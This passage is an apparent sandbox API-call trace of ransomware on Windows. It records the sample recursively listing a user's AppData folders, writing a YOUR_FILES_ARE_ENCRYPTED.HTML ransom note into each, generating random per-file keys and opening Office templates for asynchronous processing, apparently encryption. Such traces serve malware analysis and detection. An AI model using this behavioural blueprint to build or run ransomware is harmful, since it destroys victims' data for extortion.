pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0165.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.098] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.100] CloseHandle (hObject=0x304) returned 1 [0165.100] GetProcessHeap () returned 0x270000 [0165.101] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0165.101] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.101] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.102] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.104] CloseHandle (hObject=0x5e4) returned 1 [0165.105] GetProcessHeap () returned 0x270000 [0165.106] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.106] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0165.106] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 74 [0165.106] GetProcessHeap () returned 0x270000 [0165.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.106] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0165.106] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0165.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.109] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.109] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1033", cAlternateFileName="")) returned 1 [0165.109] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 79 [0165.109] GetProcessHeap () returned 0x270000 [0165.109] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.109] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0165.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0165.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.110] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.110] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16", cAlternateFileName="")) returned 1 [0165.110] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 82 [0165.110] GetProcessHeap () returned 0x270000 [0165.110] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.110] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0165.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0165.110] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.110] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.110] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb4cd600, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6ffcadf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0165.110] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 112 [0165.110] lstrcmpW (lpString1="Built-In Building Blocks.dotx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.110] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0165.110] lstrlenW (lpString=".dotx") returned 5 [0165.110] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0165.111] 
SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0165.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0165.111] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=3706055) returned 1 [0165.111] GetProcessHeap () returned 0x270000 [0165.111] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.115] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="DA") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AC") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="0F") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="8F") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="54") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="94") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="E9") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="44") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="77") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="59") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="6C") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="EA") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: 
param_1="F4") returned 2 [0165.115] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="8B") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="C5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="94") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="11") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="F0") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="96") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="E8") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="8D") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="50") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="EA") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="90") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="D5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="F5") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C7") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E3") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="72") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="00") returned 2 [0165.116] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="41") returned 2 [0165.117] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" [0165.117] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.117] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.117] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb4cd600, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6ffcadf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0165.117] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.120] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0165.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.227] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.229] CloseHandle (hObject=0x5b8) returned 1 [0165.230] GetProcessHeap () returned 0x270000 [0165.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.231] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4cd600, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4cd600, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16", cAlternateFileName="")) returned 0 [0165.231] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.231] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0165.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.232] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.235] CloseHandle (hObject=0x304) returned 1 [0165.236] GetProcessHeap () returned 0x270000 
[0165.237] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.242] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4a74a0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb4a74a0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb4a74a0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1033", cAlternateFileName="")) returned 0 [0165.242] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.242] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0165.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\document building blocks\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.243] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.245] CloseHandle (hObject=0x5e4) returned 1 [0165.246] GetProcessHeap () returned 0x270000 [0165.248] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.249] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0165.249] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel") returned 55 [0165.249] GetProcessHeap () returned 0x270000 [0165.249] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.249] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel" [0165.249] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*" [0165.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.250] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0165.251] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 63 [0165.251] GetProcessHeap () returned 0x270000 [0165.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 